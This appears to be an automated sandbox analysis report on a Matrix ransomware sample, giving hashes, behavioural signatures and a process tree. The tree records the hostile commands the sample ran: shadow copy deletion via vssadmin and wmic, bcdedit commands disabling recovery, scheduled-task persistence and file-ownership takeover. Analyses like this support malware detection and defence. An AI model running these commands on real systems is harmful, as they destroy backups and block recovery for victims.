Overview

overview

10

Static

static

3eff2f818a...63.exe

windows7_x64

10

3eff2f818a...63.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    4294210s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    05-03-2022 22:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe

  • Size

    3.8MB

  • MD5

    ac42a9b2338847bb398152b1bf6401fd

  • SHA1

    02daf9ff6773da4d134c94fdb7630af2cc01e399

  • SHA256

    3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63

  • SHA512

    016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1

Score
10/10
matrixdiscoveryevasionpersistenceransomwarespywarestealersuricataupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
    "C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe" "C:\Users\Admin\AppData\Local\Temp\NW1sCasE.exe"
      2⤵
        PID:1740
      • C:\Users\Admin\AppData\Local\Temp\NW1sCasE.exe
        "C:\Users\Admin\AppData\Local\Temp\NW1sCasE.exe" -n
        2⤵
        • Executes dropped EXE
        PID:864
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\DKpRx49j.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\oeVQTt4t.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:788
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\oeVQTt4t.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1680
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:272
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1416
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\tC49hTyc.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1748
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\tC49hTyc.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:948
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\SuFhFwrG.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                  PID:1020
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\SuFhFwrG.bat" /sc minute /mo 5 /RL HIGHEST /F
                    5⤵
                    • Creates scheduled task(s)
                    PID:1540
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                  4⤵
                    PID:1244
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /Run /I /tn DSHCA
                      5⤵
                        PID:572
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YrIUUH73.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1328
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                    3⤵
                    • Views/modifies file attributes
                    PID:1948
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
                    3⤵
                      PID:1048
                    • C:\Windows\SysWOW64\takeown.exe
                      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                      3⤵
                      • Modifies file permissions
                      PID:748
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c T1gA55Tt.exe -accepteula "StandardBusiness.pdf" -nobanner
                      3⤵
                      • Loads dropped DLL
                      PID:1616
                      • C:\Users\Admin\AppData\Local\Temp\T1gA55Tt.exe
                        T1gA55Tt.exe -accepteula "StandardBusiness.pdf" -nobanner
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:972
                        • C:\Users\Admin\AppData\Local\Temp\T1gA55Tt64.exe
                          T1gA55Tt.exe -accepteula "StandardBusiness.pdf" -nobanner
                          5⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Enumerates connected drives
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: LoadsDriver
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1620
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {F4E23127-548E-4E01-9716-D978787B24D3} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
                  1⤵
                    PID:672
                    • C:\Windows\SYSTEM32\cmd.exe
                      C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\SuFhFwrG.bat"
                      2⤵
                        PID:1632
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin Delete Shadows /All /Quiet
                          3⤵
                          • Interacts with shadow copies
                          PID:1096
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic SHADOWCOPY DELETE
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1408
                        • C:\Windows\system32\bcdedit.exe
                          bcdedit /set {default} recoveryenabled No
                          3⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2008
                        • C:\Windows\system32\bcdedit.exe
                          bcdedit /set {default} bootstatuspolicy ignoreallfailures
                          3⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1880
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN DSHCA /F
                          3⤵
                            PID:1884
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2012

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/1792-54-0x00000000752A1000-0x00000000752A3000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/2036-64-0x00000000022B0000-0x0000000002EFA000-memory.dmp

                        Filesize

                        12.3MB

                        Download

                      • memory/2036-63-0x0000000073650000-0x0000000073BFB000-memory.dmp

                        Filesize

                        5.7MB

                        Download

                      • memory/2036-62-0x00000000022B0000-0x0000000002EFA000-memory.dmp

                        Filesize

                        12.3MB

                        Download

                      • memory/2036-61-0x0000000073650000-0x0000000073BFB000-memory.dmp

                        Filesize

                        5.7MB

                        Download